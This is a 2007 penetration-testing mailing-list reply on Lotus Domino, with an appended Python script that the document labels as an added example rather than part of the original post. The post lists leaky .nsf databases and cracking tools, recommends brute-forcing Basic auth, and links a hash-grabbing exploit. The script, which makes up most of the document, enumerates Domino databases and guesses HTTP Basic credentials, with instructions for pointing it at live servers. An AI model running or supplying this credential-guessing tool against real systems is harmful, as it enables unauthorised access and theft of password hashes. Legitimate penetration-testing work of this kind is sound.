Penetration Testing mailing list archives
Re: Domino testing
From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 23 Jul 2007 15:21:55 +0200 (Western Europe Standard Time)
Hey,

On Fri, 20 Jul 2007, A Plasmoid wrote:
> I'm new to Domino testing, and have found a few interesting databases. I am wondering if there is anything that could be done with them. Specifically, there are:
> cldbdir.nsf
This is the Cluster Directory: obvious information leak.
> dba4.nsf
Besides the obvious information leak due to unrestricted access to the Database Analysis feature itself, there seems to be a file disclosure vulnerability affecting dba4.nsf, though I've not been able to find more details (see http://www.eeye.com/html/Products/Retina/RTHs/Web_Servers/).
You may try to check IBM's changelog and fix lists for anything mentioning a security vulnerability on dba4.nsf.
> qstart.nsf
Quick Start: I don't see any immediate security implications, but the golden rule of "disable all unused/unneeded stuff" should be applied.
> /sample/faqw46.nsf
> /sample/pagesw46.nsf (several others in sample)
> /help/help5_designer.nsf (several others in help)
See above.
> The ?EditDocument functionality is locked down with "basic authentication" but I can view them. There is not a lot of info (that I have found) regarding Domino, so I'm hoping that some kind person here can tell me whether these things can be leveraged into a deeper level of access or not.
Here are some interesting resources about Lotus Domino/Notes security that may help in your task:
http://www.dominosecurity.org/
http://www.ngssoftware.com/papers/hpldws.pdf
http://www.fortconsult.net/images/pdf/lotusnotes_keyfiles.pdf
http://seclists.org/pen-test/2002/Nov/0034.html (whole thread)
http://documents.iss.net/whitepapers/domino.pdf
http://www-128.ibm.com/developerworks/views/lotus/library.jsp
http://www-128.ibm.com/developerworks/lotus/security/
http://www.redbooks.ibm.com/redbooks/pdfs/sg247017.pdf
http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg245341.pdf

And some testing tools:

http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip
http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz
http://www.cqure.net/wp/?page_id=17
http://www.appsecinc.com/products/appdetective/domino/ (commercial!)
http://www.rapid7.com/nexpose/features.jsp (commercial!)
http://www.openwall.com/john
http://usuarios.lycos.es/reinob/
http://www.nestonline.com/lcrack/
http://www.securiteinfo.com/download/dhb.zip
http://www.cqure.net/wp/?page_id=12
Other commercial password crackers from Elcomsoft/Passware/etc.
> All of the other "important" databases like names.nsf, webadmin.nsf, and others are also protected with basic auth.
If compatible with scope and legal agreement, you should try to brute force the Basic Authentication to get access to the protected databases and functionalities. Some manual password guessing also doesn't hurt ;)
If you're ultimately able to get access to names.nsf, you may use my CVE-2005-2428 exploit to grab all password hashes:
http://www.0xdeadbeef.info/exploits/raptor_dominohash
> Thanks for any hints, clues, and even "Google is your friend" stuff (as long as there is a corresponding reasonable search parameter) :)
Hope this helps,

--
Marco Ivaldi, OPST
Chief Security Officer
Data Security Division @ Mediaservice.net Srl
http://mediaservice.net/
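The enumeration and credential-guessing steps Marco describes, as an added example that is not from the original post and not code from DominoHunter, raptor_dominohash or any other tool linked above. It probes the databases named in the thread with the standard Domino URL command ?OpenDatabase, sorts them into open / auth-required / missing, and then tries a short (user, password) list over HTTP Basic auth against the protected ones. The host name, the candidate credentials and the canned answers in constructed_fetcher are assumptions invented for this illustration so the script runs offline; pass urllib_fetcher instead to run it against a real, in-scope server.

```python
"""Domino .nsf probe plus small HTTP Basic credential check.

Added example, not the thread's own code. The URL command ?OpenDatabase is
standard Domino URL syntax; everything about the target (host, credentials,
canned responses in constructed_fetcher) is made up for this illustration.
"""
import base64
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Tuple

# Databases mentioned in the thread, relative to the Domino HTTP root.
DATABASES = [
    "cldbdir.nsf", "dba4.nsf", "qstart.nsf",
    "sample/faqw46.nsf", "sample/pagesw46.nsf", "help/help5_designer.nsf",
    "names.nsf", "webadmin.nsf",
]

# A fetcher takes (url, Authorization header value or None) and returns
# (status, body), so the same logic runs against a real or a canned server.
Fetcher = Callable[[str, Optional[str]], Tuple[int, str]]


def basic_header(user: str, password: str) -> str:
    """Build the value of an HTTP Basic Authorization header."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def urllib_fetcher(url: str, auth: Optional[str]) -> Tuple[int, str]:
    """Real fetcher: one GET, returning the status even on 401/403/404."""
    req = urllib.request.Request(url)
    if auth:
        req.add_header("Authorization", auth)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("latin-1", "replace")


def classify(status: int) -> str:
    """Map an HTTP status to what it means for a Domino database probe."""
    if status == 200:
        return "open"            # readable anonymously: information leak
    if status in (401, 403):
        return "auth-required"   # candidate for credential guessing
    if status == 404:
        return "missing"         # not present (or hidden by a redirect rule)
    return f"http-{status}"


def probe(base: str, fetch: Fetcher = urllib_fetcher,
          databases: Iterable[str] = DATABASES) -> Dict[str, str]:
    """Open each database anonymously and classify the answer."""
    return {db: classify(fetch(f"{base}/{db}?OpenDatabase", None)[0])
            for db in databases}


def guess_basic_auth(base: str, db: str, candidates: Iterable[Tuple[str, str]],
                     fetch: Fetcher = urllib_fetcher) -> Optional[Tuple[str, str]]:
    """Try each (user, password) pair against one protected database.

    Returns the first pair that yields 200, else None. Keep the list short:
    this is manual guessing, done with scope and lockout policy in mind."""
    for user, password in candidates:
        status, _ = fetch(f"{base}/{db}?OpenDatabase", basic_header(user, password))
        if status == 200:
            return user, password
    return None


# Constructed stand-in for a Domino server so the script runs offline: two
# databases are open, one is absent, the rest demand Basic auth and only the
# made-up pair admin / password opens them. None of this is real server data.
_CANNED_CREDENTIAL = basic_header("admin", "password")


def constructed_fetcher(url: str, auth: Optional[str]) -> Tuple[int, str]:
    path = url.split("?", 1)[0]
    if path.endswith(("cldbdir.nsf", "dba4.nsf")):
        return 200, "<html>Cluster Directory</html>"
    if path.endswith("help/help5_designer.nsf"):
        return 404, "Not Found"
    if auth == _CANNED_CREDENTIAL:
        return 200, "<html>Domino Directory</html>"
    return 401, "Please identify yourself"


def demo(base: str = "http://domino.example.test",
         fetch: Fetcher = constructed_fetcher):
    """Probe, then guess against whatever required authentication."""
    found = probe(base, fetch)
    wordlist = [("admin", "admin"), ("admin", "notes"), ("admin", "password")]
    hits = {db: guess_basic_auth(base, db, wordlist, fetch)
            for db, state in found.items() if state == "auth-required"}
    return found, hits


if __name__ == "__main__":
    for part in demo():
        print(part)
```

Two practical caveats when pointing this at a real target: every attempt is written to the Domino HTTP log, and where the server enforces an Internet password lockout policy a long wordlist will lock the very account you are after, so keep the candidate list short and agree the approach in the engagement's rules first. A 200 on names.nsf is the point at which the raptor_dominohash approach linked above becomes relevant.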